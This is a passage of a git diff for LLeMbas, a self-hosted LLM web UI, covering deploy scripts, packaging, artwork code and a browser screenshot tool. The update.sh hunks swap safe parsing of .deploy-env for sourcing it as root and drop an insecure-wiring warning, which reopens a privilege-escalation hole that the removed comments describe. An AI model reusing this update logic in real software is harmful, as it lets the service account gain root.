--unprivileged 1 \
|
||||
--features nesting=1 \
|
||||
--onboot 1
|
||||
echo " created"
|
||||
fi
|
||||
|
||||
pct start "$CTID" 2>/dev/null || true
|
||||
# `pct exec` returns before the container's own network is up, and the very next
|
||||
# thing this does is apt-get. Waiting on DNS resolving rather than on a fixed
|
||||
# sleep, because a fixed sleep is either too short on a slow host or wasted on a
|
||||
# fast one.
|
||||
echo "== waiting for the network =="
|
||||
for _ in $(seq 1 30); do
|
||||
pct exec "$CTID" -- getent hosts deb.debian.org >/dev/null 2>&1 && break
|
||||
sleep 2
|
||||
done
|
||||
|
||||
echo "== dependencies =="
|
||||
pct exec "$CTID" -- bash -lc '
|
||||
set -e
|
||||
export DEBIAN_FRONTEND=noninteractive
|
||||
apt-get update -qq
|
||||
apt-get install -y -qq --no-install-recommends \
|
||||
git python3 python3-venv python3-pip nginx openssl sudo ca-certificates
|
||||
'
|
||||
|
||||
echo "== checkout =="
|
||||
pct exec "$CTID" -- bash -lc "
|
||||
set -e
|
||||
rm -rf /tmp/lembas-src
|
||||
git clone --quiet --branch '$BRANCH' '$REPO_URL' /tmp/lembas-src
|
||||
"
|
||||
|
||||
# The same installer this repository ships, run inside. Everything it decides --
|
||||
# the service user, the prefix, the unit, the vhost, the self-signed certificate
|
||||
# -- it decides there, so this script has no opinions to keep in step with it.
|
||||
#
|
||||
# The update helper is **on by default here**, and only here. `install.sh`
|
||||
# defaults it off because it cannot know what it is installing onto: on a shared
|
||||
# or long-lived host, letting anybody who can administer the web interface
|
||||
# deploy as root is a decision somebody should make on purpose. A container
|
||||
# created by this script thirty seconds ago is not that host -- it exists to run
|
||||
# LLeMbas and nothing else, whoever ran this owns the hypervisor, and an
|
||||
# appliance you cannot update without a shell is an appliance nobody updates.
|
||||
#
|
||||
# Set INSTALL_UPDATE_HELPER=0 to opt back out.
|
||||
INSTALL_UPDATE_HELPER="${INSTALL_UPDATE_HELPER:-1}"
|
||||
LEMBAS_CHANNEL="${LEMBAS_CHANNEL:-stable}"
|
||||
|
||||
echo "== install =="
|
||||
pct exec "$CTID" -- bash -lc "
|
||||
set -e
|
||||
SITE_HOST='$SITE_HOST' LEMBAS_BRANCH='$BRANCH' REPO_URL='$REPO_URL' \
|
||||
INSTALL_UPDATE_HELPER='$INSTALL_UPDATE_HELPER' \
|
||||
LEMBAS_CHANNEL='$LEMBAS_CHANNEL' \
|
||||
bash /tmp/lembas-src/deploy/install.sh
|
||||
"
|
||||
|
||||
address=$(pct exec "$CTID" -- hostname -I 2>/dev/null | awk '{print $1}')
|
||||
echo
|
||||
echo "LLeMbas is installed in container $CTID."
|
||||
echo " address : ${address:-unknown}"
|
||||
echo " site : https://$SITE_HOST (self-signed; accept the warning)"
|
||||
echo
|
||||
echo "Point '$SITE_HOST' at ${address:-the container} in your DNS or hosts file,"
|
||||
echo "then create the first account -- it becomes the administrator."
|
||||
+4
-86
@@ -10,11 +10,6 @@ set -euo pipefail
|
||||
SERVICE_USER="${SERVICE_USER:-lembas}"
|
||||
PREFIX="${PREFIX:-/srv/lembas}"
|
||||
BRANCH="${LEMBAS_BRANCH:-main}"
|
||||
# `stable` deploys the newest release tag; `edge` deploys the branch tip. Stable
|
||||
# is the default because a branch tip is not a release -- following one means
|
||||
# deploying whatever was pushed five minutes ago. A host with no tags yet falls
|
||||
# back to the branch and says so, rather than refusing to update at all.
|
||||
CHANNEL="${LEMBAS_CHANNEL:-stable}"
|
||||
|
||||
APP="$PREFIX/app"
|
||||
VENV="$PREFIX/venv"
|
||||
@@ -29,43 +24,8 @@ git_as() { sudo -u "$SERVICE_USER" git -C "$APP" "$@"; }
|
||||
before=$(git_as rev-parse HEAD)
|
||||
|
||||
echo "== fetching =="
|
||||
# `--tags` and `--force`: without the first, the stable channel never learns
|
||||
# about a release; without the second, a tag that was moved -- which happens to a
|
||||
# release cut wrong -- is refused rather than updated, and the host sits on the
|
||||
# old one with no sign of why.
|
||||
git_as fetch --quiet --tags --force origin "$BRANCH"
|
||||
|
||||
# What to land on. A release tag on stable, the branch tip on edge. The tag
|
||||
# pattern deliberately excludes anything with a suffix: `v1.1.0-rc1` sorts above
|
||||
# `v1.1.0` under git's version sort, so accepting it would step a stable host
|
||||
# onto a release candidate on the strength of a hyphen.
|
||||
target="origin/$BRANCH"
|
||||
if [[ "$CHANNEL" == "stable" ]]; then
|
||||
# `|| true` is load-bearing under `set -euo pipefail`, and for two reasons:
|
||||
# grep exits 1 when nothing matches -- which is every host until the first
|
||||
# release is tagged -- and `head -1` closing the pipe early can hand grep a
|
||||
# SIGPIPE. Either kills the script mid-update, after the fetch and before the
|
||||
# reset, leaving the checkout fetched and unmoved with no error printed.
|
||||
newest=$(git_as tag --list --sort=-v:refname \
|
||||
| grep -E '^v?[0-9]+\.[0-9]+\.[0-9]+$' | head -1 || true)
|
||||
if [[ -n "$newest" ]]; then
|
||||
target="$newest"
|
||||
else
|
||||
echo " no release tags yet; following $BRANCH instead"
|
||||
fi
|
||||
fi
|
||||
echo " channel $CHANNEL -> $target"
|
||||
|
||||
if [[ "$target" == "origin/$BRANCH" ]]; then
|
||||
# Stays on the branch, which is what this always did.
|
||||
git_as reset --hard --quiet "$target"
|
||||
else
|
||||
# Detached at the tag. A `reset --hard <tag>` while on `main` would move the
|
||||
# local branch to it, which is a rewrite of a ref nobody asked to rewrite --
|
||||
# and the deployment checkout is never developed in, so being at a commit
|
||||
# rather than on a branch is the more honest state anyway.
|
||||
git_as -c advice.detachedHead=false checkout --force --detach --quiet "$target"
|
||||
fi
|
||||
git_as fetch --quiet origin "$BRANCH"
|
||||
git_as reset --hard --quiet "origin/$BRANCH"
|
||||
|
||||
after=$(git_as rev-parse HEAD)
|
||||
|
||||
@@ -98,39 +58,6 @@ sudo -u "$SERVICE_USER" "$VENV/bin/pip" install --quiet -e "$APP[$LEMBAS_EXTRAS]
|
||||
# The drift is worth catching: a change in the unit can be what makes a release
|
||||
# work at all, and a host that pulled the code without it would run the new
|
||||
# version under the old settings and fail confusingly.
|
||||
# This script itself, first, because root is running a copy of it.
|
||||
#
|
||||
# `install.sh` puts a root-owned copy outside the checkout and points the unit
|
||||
# there -- root must not execute a file the unprivileged service account can
|
||||
# write, nor one that an update just fetched. The cost of that is exactly this:
|
||||
# the copy can fall behind what the checkout ships, silently, and the way to
|
||||
# notice is to compare.
|
||||
#
|
||||
# `$0` is the copy being run; `$APP/deploy/update.sh` is what was just pulled.
|
||||
self=$(readlink -f "$0")
|
||||
if [[ "$self" == "$(readlink -f "$APP")"/* ]]; then
|
||||
# The old wiring, and the one that matters: the unit points *into the
|
||||
# checkout*, so root is executing a file the unprivileged service account
|
||||
# owns and that every update overwrites. Fires on exactly the hosts installed
|
||||
# before this was fixed, and never afterwards.
|
||||
echo "== update helper: INSECURE WIRING ==" >&2
|
||||
echo " This unit runs $self as root, and that file is owned by" >&2
|
||||
echo " $SERVICE_USER -- the account the web application runs as. Anything" >&2
|
||||
echo " able to write as that account can rewrite it and be root, and so" >&2
|
||||
echo " can whoever controls the branch this host follows." >&2
|
||||
echo " Fix by re-running the installer, which moves root's copy out:" >&2
|
||||
echo " cd $APP && sudo INSTALL_UPDATE_HELPER=1 ./deploy/install.sh" >&2
|
||||
elif [[ -f "$APP/deploy/update.sh" ]]; then
|
||||
running_helper=$(sha256sum "$self" | cut -d' ' -f1)
|
||||
shipped_helper=$(sha256sum "$APP/deploy/update.sh" | cut -d' ' -f1)
|
||||
if [[ "$running_helper" != "$shipped_helper" ]]; then
|
||||
echo "== update helper ==" >&2
|
||||
echo " deploy/update.sh has changed since this host's copy was installed." >&2
|
||||
echo " Re-run the installer to take it:" >&2
|
||||
echo " cd $APP && sudo INSTALL_UPDATE_HELPER=1 ./deploy/install.sh" >&2
|
||||
fi
|
||||
fi
|
||||
|
||||
STAMP="$PREFIX/.unit-applied"
|
||||
current=$(sha256sum "$APP/deploy/lembas.service" | cut -d' ' -f1)
|
||||
if [[ -f "$STAMP" && "$(cat "$STAMP")" != "$current" ]]; then
|
||||
@@ -163,18 +90,9 @@ site_host=""; app_port=""
|
||||
# recovered from the environment file and the vhost found by what it proxies to.
|
||||
# Guessing "your-host" instead would have skipped the check on exactly the hosts
|
||||
# it was added for.
|
||||
# **Parsed, never sourced.** `.deploy-env` is written by the installer with
|
||||
# `sudo tee`, so the file is root-owned -- but `$PREFIX` is the service
|
||||
# account's own directory, mode 755, and write permission on a directory is all
|
||||
# it takes to unlink a file and put another one there. `.` would have run its
|
||||
# contents as root, and this script is root-triggerable by anyone who can create
|
||||
# one file in `$PREFIX/data` -- which is that same account. Two keys, two
|
||||
# patterns, and anything else in the file is ignored rather than executed.
|
||||
if [[ -f "$PREFIX/.deploy-env" ]]; then
|
||||
site_host=$(sed -n 's/^SITE_HOST=\([A-Za-z0-9._-]\{1,253\}\)$/\1/p' \
|
||||
"$PREFIX/.deploy-env" | tail -1)
|
||||
app_port=$(sed -n 's/^APP_PORT=\([0-9]\{1,5\}\)$/\1/p' \
|
||||
"$PREFIX/.deploy-env" | tail -1)
|
||||
. "$PREFIX/.deploy-env"
|
||||
site_host="$SITE_HOST"; app_port="$APP_PORT"
|
||||
fi
|
||||
if [[ -z "$app_port" && -f "$PREFIX/lembas.env" ]]; then
|
||||
app_port=$(sed -n 's/^LEMBAS_PORT=//p' "$PREFIX/lembas.env" | tail -1)
|
||||
|
||||
@@ -1,57 +0,0 @@
|
||||
# LLeMbas, and nothing else.
|
||||
#
|
||||
# Deliberately no reverse proxy in here. Which one to use, where the certificate
|
||||
# comes from and what else the host already serves are all decisions this file
|
||||
# cannot make -- and baking one in would mean anybody who already runs Caddy or
|
||||
# Traefik has to unpick it first. What this does is publish on loopback, which is
|
||||
# what a proxy on the same host proxies to.
|
||||
#
|
||||
# **TLS is not optional in practice.** The service worker and the microphone both
|
||||
# require HTTPS or localhost, so over plain http on a LAN address the app cannot
|
||||
# be installed and cannot dictate. See deploy/README.md.
|
||||
|
||||
services:
|
||||
lembas:
|
||||
build: .
|
||||
image: lembas:latest
|
||||
restart: unless-stopped
|
||||
|
||||
environment:
|
||||
# Generate once and keep it: rotating this signs every user out *and*
|
||||
# makes stored upstream API keys unreadable, because they are encrypted
|
||||
# with it. `lembas secret-key` prints one.
|
||||
#
|
||||
# Required with no default on purpose. A compose file with a key in it is
|
||||
# a key in everybody's git history, and one that quietly generated a
|
||||
# temporary one would lose every stored credential on the next restart.
|
||||
LEMBAS_SECRET_KEY: ${LEMBAS_SECRET_KEY:?set LEMBAS_SECRET_KEY in .env}
|
||||
LEMBAS_DATA_DIR: /data
|
||||
LEMBAS_HOST: 0.0.0.0
|
||||
LEMBAS_PORT: 8080
|
||||
LEMBAS_LOG_LEVEL: ${LEMBAS_LOG_LEVEL:-info}
|
||||
LEMBAS_ALLOW_SIGNUP: ${LEMBAS_ALLOW_SIGNUP:-true}
|
||||
|
||||
# 127.0.0.1 rather than 0.0.0.0: the session cookie is deliberately not
|
||||
# marked `secure` so a localhost install can sign anybody in at all, which
|
||||
# means a network attacker on plain http could steal a session. Publishing
|
||||
# this on a LAN interface without a proxy in front is the one configuration
|
||||
# that turns that from a note into a problem.
|
||||
ports:
|
||||
- "127.0.0.1:8080:8080"
|
||||
|
||||
volumes:
|
||||
# The database, the uploads, the encryption at rest. A named volume rather
|
||||
# than a bind mount so it survives `docker compose down` -- `down -v` is
|
||||
# the command that deletes it, and that asymmetry is the point.
|
||||
- lembas-data:/data
|
||||
|
||||
# One worker, and that is not a shortcut. The generation registry, the stop
|
||||
# mechanism, the terminal sessions and the schedule ticker are all
|
||||
# in-process; two of these would mean two tickers and every schedule firing
|
||||
# twice. Scaling this service is not supported -- see PLAN.md's first known
|
||||
# limit.
|
||||
deploy:
|
||||
replicas: 1
|
||||
|
||||
volumes:
|
||||
lembas-data:
|
||||
+2
-17
@@ -4,11 +4,7 @@ build-backend = "hatchling.build"
|
||||
|
||||
[project]
|
||||
name = "lembas"
|
||||
# Read from lembas.__version__ rather than written here. Two copies drifted
|
||||
# three minor versions apart without anything noticing, because nothing reads
|
||||
# this one: the app, the service worker cache key and the page footer all read
|
||||
# the module. See [tool.hatch.version] below.
|
||||
dynamic = ["version"]
|
||||
version = "0.6.2"
|
||||
description = "LLeMbas - a Middle-earth themed web UI for OpenAI-compatible LLM endpoints"
|
||||
readme = "README.md"
|
||||
requires-python = ">=3.11"
|
||||
@@ -64,10 +60,7 @@ ssh = ["asyncssh[bcrypt]>=2.14"]
|
||||
lembas = "lembas.cli:app"
|
||||
|
||||
[project.urls]
|
||||
Homepage = "https://git.houmeres.sk/Houmeres/LLeMbas"
|
||||
|
||||
[tool.hatch.version]
|
||||
path = "src/lembas/__init__.py"
|
||||
Homepage = "https://github.com/homer/LLeMbas"
|
||||
|
||||
[tool.hatch.build.targets.wheel]
|
||||
packages = ["src/lembas"]
|
||||
@@ -83,13 +76,5 @@ ignore = ["B008"] # FastAPI Depends() in defaults is idiomatic
|
||||
|
||||
[tool.pytest.ini_options]
|
||||
testpaths = ["tests"]
|
||||
# Registered so `-m "not slow"` works and an unknown-marker warning does not
|
||||
# become an error later. `slow` is for the tests that stand up something real:
|
||||
# a uvicorn subprocess on a port, an asyncssh server, a PTY, a git repository
|
||||
# built with subprocess. They are the ones worth having and the ones worth
|
||||
# being able to skip while iterating.
|
||||
markers = [
|
||||
"slow: stands up a real server, shell or repository",
|
||||
]
|
||||
asyncio_mode = "auto"
|
||||
filterwarnings = ["ignore::DeprecationWarning"]
|
||||
|
||||
@@ -53,7 +53,6 @@ SERVED_BY_APP = (
|
||||
"icon-512.png",
|
||||
"icon-maskable-512.png",
|
||||
"apple-touch-icon-180.png",
|
||||
"badge-72.png",
|
||||
)
|
||||
|
||||
FONT_SEMIBOLD = Path("/usr/share/fonts/adobe-source-serif/SourceSerif4Display-Semibold.otf")
|
||||
@@ -424,28 +423,6 @@ def build_apple_touch_icon() -> bytes:
|
||||
return _rasterise(_framed_mark("iios", background=NIGHT_MID, inset=0.06), 180)
|
||||
|
||||
|
||||
def build_badge() -> bytes:
|
||||
"""The small mark beside a notification in the Android status bar.
|
||||
|
||||
A badge is used as a *mask*: the device keeps the alpha channel and throws
|
||||
every colour away. So this is the leaf as a solid silhouette on nothing --
|
||||
no gradients, no rim, no veins, none of which would survive, and a plate
|
||||
behind it least of all. The application used `icon-192.png` here, which is
|
||||
opaque to its edges, so what Android drew was a grey square.
|
||||
|
||||
72px because that is the size Android asks for, and small enough that the
|
||||
blade alone is the only part that still reads.
|
||||
"""
|
||||
return _rasterise(
|
||||
f"""{HEADER} viewBox="0 0 64 64" width="64" height="64"
|
||||
role="img" aria-label="LLeMbas">
|
||||
<path d="{LEAF_BLADE}" fill="#FFFFFF"/>
|
||||
</svg>
|
||||
""",
|
||||
72,
|
||||
)
|
||||
|
||||
|
||||
def _mountains(width: float, base_y: float, seed: int, height: float, colour: str) -> str:
|
||||
"""One jagged ridge line spanning the full width."""
|
||||
rng = random.Random(seed)
|
||||
@@ -587,7 +564,6 @@ BUILDERS = {
|
||||
"icon-512.png": build_icon_512,
|
||||
"icon-maskable-512.png": build_icon_maskable,
|
||||
"apple-touch-icon-180.png": build_apple_touch_icon,
|
||||
"badge-72.png": build_badge,
|
||||
}
|
||||
|
||||
|
||||
|
||||
@@ -1,402 +0,0 @@
|
||||
"""Render LLeMbas pages in a real browser, at a real size.
|
||||
|
||||
Run it:
|
||||
|
||||
python scripts/shoot.py OUTDIR [/chat,/settings] # measure + capture
|
||||
python scripts/shoot.py OUTDIR --manifest-screenshots # the two the
|
||||
# manifest wants
|
||||
|
||||
Needs a `chromium` on PATH and the development dependencies installed. It is a
|
||||
development instrument, like the Node DOM stub the JavaScript is driven under
|
||||
and like `fetch_vendor.py` -- it is not imported by the application and nothing
|
||||
in `src/` knows it exists.
|
||||
|
||||
Not a test runner: an instrument. It renders a page through TestClient, rewrites
|
||||
every asset URL to a file:// path, and refuses to continue if even one is left
|
||||
pointing at `testserver` -- because the last harness that did this silently
|
||||
measured an unstyled document and reported all five tab panels visible at once.
|
||||
A dramatic finding that was entirely an artefact of a rewrite matching nothing.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import re
|
||||
import shutil
|
||||
import subprocess
|
||||
import sys
|
||||
import tempfile
|
||||
from pathlib import Path
|
||||
|
||||
REPO = Path(__file__).resolve().parent.parent
|
||||
sys.path.insert(0, str(REPO / "src"))
|
||||
|
||||
# Resolved from the package that actually got imported, not from where this
|
||||
# file happens to sit. A copy of this script run from somewhere else silently
|
||||
# pointed STATIC at a directory that did not exist, every asset URL was
|
||||
# rewritten to a file:// path with nothing behind it, and the run measured an
|
||||
# unstyled document -- reporting that every page in the application overflowed
|
||||
# by thirty thousand pixels. The guard below only asked whether the URLs had
|
||||
# been rewritten, which they had.
|
||||
import lembas # noqa: E402
|
||||
|
||||
SRC = Path(lembas.__file__).resolve().parent.parent
|
||||
STATIC = Path(lembas.__file__).resolve().parent / "web/static"
|
||||
CHROMIUM = shutil.which("chromium") or shutil.which("chromium-browser")
|
||||
|
||||
# Routes that are served by the app rather than mounted, so the rewrite has to
|
||||
# fetch them rather than point at a file that does not exist.
|
||||
ROUTE_ASSETS = {"/branding.css": "branding.css", "/sw.js": "sw.js"}
|
||||
|
||||
MEASURE = """
|
||||
<script>
|
||||
window.__measure = function () {
|
||||
var de = document.scrollingElement || document.documentElement;
|
||||
var small = [];
|
||||
document.querySelectorAll(
|
||||
'button, a.btn, a.nav-item, .tabs__tab, input, select, [role=tab]'
|
||||
).forEach(function (el) {
|
||||
var r = el.getBoundingClientRect();
|
||||
if (!r.width || !r.height) return; /* hidden */
|
||||
if (el.closest('[hidden]')) return;
|
||||
/* A `.visually-hidden` radio is 1x1 on purpose -- the <label> beside it is
|
||||
the target, and that one is measured. Counting the input reports five
|
||||
failures on a settings page whose tabs are all 44px. */
|
||||
if (el.classList.contains('visually-hidden')) return;
|
||||
/* Inline text inside a sentence is not a tap target in the sense this is
|
||||
checking; it is a word you can also click. */
|
||||
if (getComputedStyle(el).display === 'inline') return;
|
||||
if (r.height < 40 || r.width < 40) {
|
||||
small.push({
|
||||
tag: el.tagName.toLowerCase(),
|
||||
cls: el.className && el.className.toString().slice(0, 60),
|
||||
label: (el.getAttribute('aria-label') || el.textContent || '').trim().slice(0, 30),
|
||||
w: Math.round(r.width), h: Math.round(r.height)
|
||||
});
|
||||
}
|
||||
});
|
||||
var wide = [];
|
||||
document.querySelectorAll('body *').forEach(function (el) {
|
||||
var r = el.getBoundingClientRect();
|
||||
if (r.right > window.innerWidth + 1 || r.left < -1) {
|
||||
wide.push({
|
||||
tag: el.tagName.toLowerCase(),
|
||||
cls: el.className && el.className.toString().slice(0, 60),
|
||||
left: Math.round(r.left), right: Math.round(r.right)
|
||||
});
|
||||
}
|
||||
});
|
||||
/* Which element is actually making the document bigger than the window.
|
||||
"the page over-scrolls" is not actionable; "`.shell` is 1756px tall in an
|
||||
844px window" is. Reported for both axes, deepest first, because the
|
||||
outermost offender is usually just the ancestor of the real one. */
|
||||
/* Content taller than the window inside something built to scroll is not
|
||||
overflow, it is the point. So an element counts only when nothing between
|
||||
it and the root can scroll in that axis -- otherwise every long settings
|
||||
page reports its own cards as a bug and the signal is lost in them. */
|
||||
function contained(el, axis) {
|
||||
var prop = axis === 'y' ? 'overflowY' : 'overflowX';
|
||||
for (var n = el.parentElement; n && n !== document.documentElement; n = n.parentElement) {
|
||||
var o = getComputedStyle(n)[prop];
|
||||
if (o === 'auto' || o === 'scroll' || o === 'hidden') return true;
|
||||
}
|
||||
return false;
|
||||
}
|
||||
|
||||
function culprits(axis) {
|
||||
var found = [];
|
||||
document.querySelectorAll('body, body *').forEach(function (el) {
|
||||
if (contained(el, axis)) return;
|
||||
var r = el.getBoundingClientRect();
|
||||
var over = axis === 'y'
|
||||
? r.bottom - window.innerHeight
|
||||
: r.right - window.innerWidth;
|
||||
if (over > 1) {
|
||||
found.push({
|
||||
tag: el.tagName.toLowerCase(),
|
||||
cls: (el.className && el.className.toString().slice(0, 50)) || '',
|
||||
over: Math.round(over),
|
||||
size: Math.round(axis === 'y' ? r.height : r.width),
|
||||
pos: getComputedStyle(el).position,
|
||||
id: el.id || '',
|
||||
parent: el.parentElement ? (el.parentElement.tagName.toLowerCase() + '.' +
|
||||
(el.parentElement.className || '').toString().slice(0, 30)) : '',
|
||||
html: el.outerHTML.slice(0, 120)
|
||||
});
|
||||
}
|
||||
});
|
||||
return found.sort(function (a, b) { return b.over - a.over; }).slice(0, 8);
|
||||
}
|
||||
|
||||
var shell = document.querySelector('.shell');
|
||||
return {
|
||||
docScrollH: de.scrollHeight,
|
||||
innerH: window.innerHeight,
|
||||
docScrollW: de.scrollWidth,
|
||||
innerW: window.innerWidth,
|
||||
bodyScrollH: document.body.scrollHeight,
|
||||
shellH: shell ? Math.round(shell.getBoundingClientRect().height) : null,
|
||||
shellW: shell ? Math.round(shell.getBoundingClientRect().width) : null,
|
||||
tallCulprits: culprits('y'),
|
||||
wideCulprits: culprits('x'),
|
||||
/* The invariant: the application shell fills the window and the DOCUMENT
|
||||
never scrolls *for the reader*. A document taller than the window is the
|
||||
/settings bug -- but only when the reader can actually move it. `overflow:
|
||||
hidden` blocks a wheel and a finger while still permitting an assignment
|
||||
to scrollTop, so a page whose shell clips a tall descendant reports a
|
||||
scrollHeight of thousands and scrolls for nobody. /admin/prompts does
|
||||
exactly that, and reading the raw height called it a bug four times. */
|
||||
documentScrolls:
|
||||
de.scrollHeight > window.innerHeight + 1 &&
|
||||
["visible", "auto", "scroll"].indexOf(
|
||||
getComputedStyle(document.documentElement).overflowY
|
||||
) !== -1,
|
||||
scrollsSideways: de.scrollWidth > window.innerWidth + 1,
|
||||
smallTargets: small.slice(0, 40),
|
||||
smallCount: small.length,
|
||||
overflowing: wide.slice(0, 20),
|
||||
overflowCount: wide.length
|
||||
};
|
||||
};
|
||||
/* Nothing is appended to the page itself. The first version of this harness
|
||||
did exactly that, and the div it added was 960px tall -- so the very first
|
||||
run reported that /chat over-scrolled by 960px on a phone, which was a
|
||||
finding entirely about the instrument. The frame outside reads __measure()
|
||||
across the boundary instead, and the page is left exactly as served. */
|
||||
</script>
|
||||
"""
|
||||
|
||||
|
||||
def build_client():
|
||||
import lembas.config as config_mod
|
||||
|
||||
tmp = Path(tempfile.mkdtemp(prefix="lembas-shoot-"))
|
||||
config_mod.settings.data_dir = tmp
|
||||
config_mod.settings.secret_key = "x" * 43
|
||||
|
||||
from fastapi.testclient import TestClient
|
||||
|
||||
from lembas.db.session import init_db, session_scope
|
||||
from lembas.main import create_app
|
||||
|
||||
init_db()
|
||||
app = create_app()
|
||||
client = TestClient(app)
|
||||
client.post(
|
||||
"/auth/register",
|
||||
data={"name": "Frodo", "email": "f@example.com", "password": "mellonmellon"},
|
||||
follow_redirects=False,
|
||||
)
|
||||
|
||||
from lembas.db.models import Connection, Model
|
||||
|
||||
with session_scope() as db:
|
||||
connection = Connection(
|
||||
name="local", base_url="http://127.0.0.1:1", api_key_encrypted=""
|
||||
)
|
||||
db.add(connection)
|
||||
db.flush()
|
||||
for name in ("gemma4-moe", "qwen3-coder"):
|
||||
db.add(Model(connection_id=connection.id, model_id=name, display_name=name))
|
||||
return client
|
||||
|
||||
|
||||
def rewrite(html: str, client, assets: Path) -> str:
|
||||
"""Point every asset at a file on disk, and prove none was missed."""
|
||||
for route, name in ROUTE_ASSETS.items():
|
||||
response = client.get(route)
|
||||
if response.status_code == 200:
|
||||
(assets / name).write_text(response.text)
|
||||
|
||||
html = re.sub(
|
||||
r'(?:http://testserver)?/static/([^"\'?\s>]+)(\?[^"\'\s>]*)?',
|
||||
lambda m: f"file://{STATIC}/{m.group(1)}",
|
||||
html,
|
||||
)
|
||||
html = re.sub(
|
||||
r'(?:http://testserver)?/branding\.css(\?[^"\'\s>]*)?',
|
||||
f"file://{assets}/branding.css",
|
||||
html,
|
||||
)
|
||||
|
||||
# Fail loudly, and only about things that decide how the page LOOKS: every
|
||||
# `src`, and `href` on a <link>. An `href` on an anchor is a destination,
|
||||
# not an asset -- flagging those makes the guard cry wolf on every page and
|
||||
# a guard nobody believes is worse than none.
|
||||
leftovers = re.findall(r'<link\b[^>]*\bhref="([^"]+)"', html)
|
||||
leftovers += re.findall(r'\bsrc="([^"]+)"', html)
|
||||
blocking = [
|
||||
url
|
||||
for url in leftovers
|
||||
if url.startswith(("/", "http://testserver"))
|
||||
and not url.startswith(("/branding/", "/manifest", "/sw.js"))
|
||||
]
|
||||
if blocking:
|
||||
raise SystemExit(
|
||||
"UNREWRITTEN ASSET URLS -- this would measure an unstyled document: "
|
||||
f"{sorted(set(blocking))[:8]}"
|
||||
)
|
||||
|
||||
# And that what they were rewritten *to* is really there. A rewrite that
|
||||
# matches and produces a dead path is indistinguishable, from inside the
|
||||
# browser, from no stylesheet at all -- and it is the failure that actually
|
||||
# happened, twice.
|
||||
missing = [
|
||||
url
|
||||
for url in re.findall(r'(?:href|src)="file://([^"?]+)"', html)
|
||||
if not Path(url).exists()
|
||||
]
|
||||
if missing:
|
||||
raise SystemExit(f"REWRITTEN TO NOTHING -- still an unstyled document: {missing[:5]}")
|
||||
|
||||
# The one-time notifications offer is a modal over the very page we came
|
||||
# to measure, and it is gated on a localStorage key. Set it in the head, so
|
||||
# it runs before the deferred script that reads it.
|
||||
quiet = (
|
||||
"<script>try{localStorage.setItem('lembas-notifications-asked','1');}"
|
||||
"catch(e){}</script>"
|
||||
)
|
||||
return html.replace("</head>", quiet + MEASURE + "</head>", 1)
|
||||
|
||||
|
||||
def shoot(client, path: str, width: int, height: int, theme: str, outdir: Path) -> dict:
|
||||
"""One page, at one size, in one theme.
|
||||
|
||||
The page is rendered inside an <iframe> of exactly the target size rather
|
||||
than into a window of it, because headless Chromium refuses to make a window
|
||||
narrower than about 500px -- ask for 390 and you get 500, and every
|
||||
measurement is then of a layout no phone will ever produce. A media query
|
||||
inside an iframe evaluates against the iframe's own viewport, so this is the
|
||||
real thing: `width: 390px` on the frame is a 390px viewport inside it.
|
||||
"""
|
||||
response = client.get(path)
|
||||
if response.status_code != 200:
|
||||
raise SystemExit(f"{path} -> HTTP {response.status_code}")
|
||||
|
||||
assets = outdir / "assets"
|
||||
assets.mkdir(parents=True, exist_ok=True)
|
||||
html = response.text.replace('data-theme="moria"', f'data-theme="{theme}"')
|
||||
html = rewrite(html, client, assets)
|
||||
|
||||
slug = f"{path.strip('/').replace('/', '-') or 'root'}-{theme}-{width}x{height}"
|
||||
page = outdir / f"{slug}.html"
|
||||
page.write_text(html)
|
||||
|
||||
frame = outdir / f"{slug}-frame.html"
|
||||
frame.write_text(
|
||||
"<!doctype html><meta charset=utf-8>"
|
||||
"<style>html,body{margin:0;background:#888}"
|
||||
f"iframe{{width:{width}px;height:{height}px;border:0;display:block}}</style>"
|
||||
f'<iframe id="f" src="{page.name}"></iframe>'
|
||||
"<div id=\"__measurements\"></div>"
|
||||
"<script>"
|
||||
"window.addEventListener('load',function(){setTimeout(function(){"
|
||||
"var w=document.getElementById('f').contentWindow;"
|
||||
"document.getElementById('__measurements').textContent="
|
||||
"JSON.stringify(w.__measure?w.__measure():{error:'no __measure -- the page did not load'});"
|
||||
"},600);});"
|
||||
"</script>"
|
||||
)
|
||||
|
||||
shot = outdir / f"{slug}.png"
|
||||
common = [
|
||||
CHROMIUM, "--headless", "--no-sandbox", "--disable-gpu",
|
||||
"--allow-file-access-from-files", "--hide-scrollbars",
|
||||
"--force-device-scale-factor=1",
|
||||
f"--window-size={max(width, 520)},{height + 40}",
|
||||
"--virtual-time-budget=4000",
|
||||
]
|
||||
subprocess.run(common + [f"--screenshot={shot}", f"file://{frame}"],
|
||||
capture_output=True, timeout=120)
|
||||
dom = subprocess.run(common + ["--dump-dom", f"file://{frame}"],
|
||||
capture_output=True, text=True, timeout=120).stdout
|
||||
|
||||
match = re.search(r'id="__measurements">(.*?)</div>', dom, re.S)
|
||||
if not match or not match.group(1).strip():
|
||||
raise SystemExit(f"no measurements for {slug} -- the frame did not report")
|
||||
data = json.loads(match.group(1))
|
||||
if "error" in data:
|
||||
raise SystemExit(f"{slug}: {data['error']}")
|
||||
data["page"] = slug
|
||||
if data["innerW"] != width:
|
||||
raise SystemExit(
|
||||
f"{slug}: measured a {data['innerW']}px viewport, asked for {width}px"
|
||||
)
|
||||
return data
|
||||
|
||||
|
||||
# The two the manifest asks for. Without them Chrome on Android falls back to
|
||||
# the one-line mini-infobar instead of the install dialog with a name, an icon
|
||||
# and a picture in it -- which is the difference between an install somebody
|
||||
# chooses and one they dismiss without reading.
|
||||
MANIFEST_SHOTS = (
|
||||
("screenshot-narrow.png", 390, 844, "narrow"),
|
||||
("screenshot-wide.png", 1280, 800, "wide"),
|
||||
)
|
||||
|
||||
|
||||
def manifest_screenshots(client, outdir: Path) -> None:
|
||||
"""Capture the two, straight into static/img/ where the manifest names them.
|
||||
|
||||
A browser capture rather than something `build_artwork.py` draws: the point
|
||||
of a screenshot is that it is what the application actually looks like, and
|
||||
an illustration of what it looks like is the one thing it must not be.
|
||||
"""
|
||||
try:
|
||||
from PIL import Image
|
||||
except ImportError: # pragma: no cover - design-time tool
|
||||
raise SystemExit("pillow is needed to crop the frame off a screenshot") from None
|
||||
|
||||
for name, width, height, _form in MANIFEST_SHOTS:
|
||||
shoot(client, "/chat", width, height, "moria", outdir)
|
||||
slug = f"chat-moria-{width}x{height}.png"
|
||||
target = STATIC / "img" / name
|
||||
# Cropped to the iframe, which sits at the origin of a zero-margin
|
||||
# wrapper. The capture is of the *outer* document, so without this the
|
||||
# screenshot carries the harness's own readout along its bottom edge
|
||||
